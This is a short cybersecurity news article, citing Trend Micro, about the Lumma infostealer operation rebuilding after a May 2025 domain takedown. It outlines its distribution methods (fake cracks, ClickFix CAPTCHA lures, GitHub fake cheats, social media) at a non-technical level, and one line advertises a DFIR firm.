The Lumma infostealer malware operation is back in full swing just weeks after law enforcement seized over 2,300 domains in a large-scale operation in May. According to cybersecurity firm Trend Micro, the Malware-as-a-Service (MaaS) platform has rapidly restored its infrastructure and resumed operations despite the massive takedown.
Operators behind Lumma Stealer acknowledged the disruption on underground forums but insisted their core server remained untouched, although it had been remotely wiped. Restoration began immediately, with evidence of resurgence seen in June. Trend Micro’s telemetry data now indicates that Lumma’s activity is nearing pre-takedown levels.
Trend Micro’s report confirms that Lumma has re-established its network by shifting away from Cloudflare and adopting a Russian-based provider, Selectel, to avoid further enforcement.
Sophisticated Tactics Signal Full-Fledged Comeback
Trend Micro has identified four main distribution vectors currently fueling Lumma’s infection wave:
Fake Cracks/Keygens: Cybercriminals push fake software cracks via malvertising and doctored search results. Victims are redirected to deceptive sites using Traffic Detection Systems (TDS) to deliver the Lumma downloader.
ClickFix Campaigns: Compromised websites host phoney CAPTCHA challenges that execute PowerShell commands, loading Lumma directly into system memory and bypassing traditional file-based detection.
GitHub Repositories: Threat actors have seeded repositories with AI-generated content offering fake game cheats. These contain Lumma payloads as standalone executables or zipped files like “TempSpoofer.exe”.
Social Media Lures: YouTube videos and Facebook posts promote cracked software, tricking users into downloading malware from sites that sometimes misuse trusted platforms like sites.google.com.
Algoritha: The Most Trusted Name in BFSI Investigations and DFIR Services
The return of Lumma—despite no reported arrests or formal charges—raises serious concerns about the long-term efficacy of takedown efforts. The MaaS model remains a lucrative and resilient arm of the cybercrime economy, with its operators seemingly undeterred by international action.